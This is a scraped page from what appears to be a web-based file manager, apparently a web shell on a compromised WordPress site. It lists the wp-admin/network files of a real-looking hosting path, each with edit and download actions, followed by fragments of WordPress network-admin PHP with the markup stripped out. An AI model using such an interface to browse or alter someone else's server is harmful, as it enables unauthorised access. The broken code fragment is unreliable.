Priority File Manager

📁 public_html
Base Directory:
/home/ecedu/public_html/wp-admin/network
NameTypeSizeActions
📁 .. Folder -
📄 about.php File 245
Edit Download
📄 admin.php File 1024
Edit Download
📄 contribute.php File 255
Edit Download
📄 credits.php File 249
Edit Download
📄 edit.php File 908
Edit Download
📄 freedoms.php File 251
Edit Download
📄 index.php File 2911
Edit Download
📄 menu.php File 4798
Edit Download
📄 plugin-editor.php File 266
Edit Download
📄 plugin-install.php File 377
Edit Download
📄 plugins.php File 249
Edit Download
📄 privacy.php File 249
Edit Download
📄 profile.php File 254
Edit Download
📄 settings.php File 21973
Edit Download
📄 setup.php File 247
Edit Download
📄 site-info.php File 7774
Edit Download
📄 site-new.php File 9571
Edit Download
📄 site-settings.php File 5626
Edit Download
📄 site-themes.php File 6875
Edit Download
📄 site-users.php File 11289
Edit Download
📄 sites.php File 13571
Edit Download
📄 theme-editor.php File 264
Edit Download
📄 theme-install.php File 374
Edit Download
📄 themes.php File 15989
Edit Download
📄 update-core.php File 253
Edit Download
📄 update.php File 450
Edit Download
📄 upgrade.php File 4966
Edit Download
📄 user-edit.php File 253
Edit Download
📄 user-new.php File 5228
Edit Download
📄 users.php File 9494
Edit Download
' . __( 'Welcome to your Network Admin. This area of the Administration Screens is used for managing all aspects of your Multisite Network.' ) . '

'; $overview .= '

' . __( 'From here you can:' ) . '

'; $overview .= ''; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $overview, ) ); $quick_tasks = '

' . __( 'The Right Now widget on this screen provides current user and site counts on your network.' ) . '

'; $quick_tasks .= ''; $quick_tasks .= '

' . __( 'To search for a user or site, use the search boxes.' ) . '

'; $quick_tasks .= ''; get_current_screen()->add_help_tab( array( 'id' => 'quick-tasks', 'title' => __( 'Quick Tasks' ), 'content' => $quick_tasks, ) ); get_current_screen()->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on the Network Admin' ) . '

' . '

' . __( 'Support forums' ) . '

' ); wp_dashboard_setup(); wp_enqueue_script( 'dashboard' ); wp_enqueue_script( 'plugin-install' ); add_thickbox(); require_once ABSPATH . 'wp-admin/admin-header.php'; ?>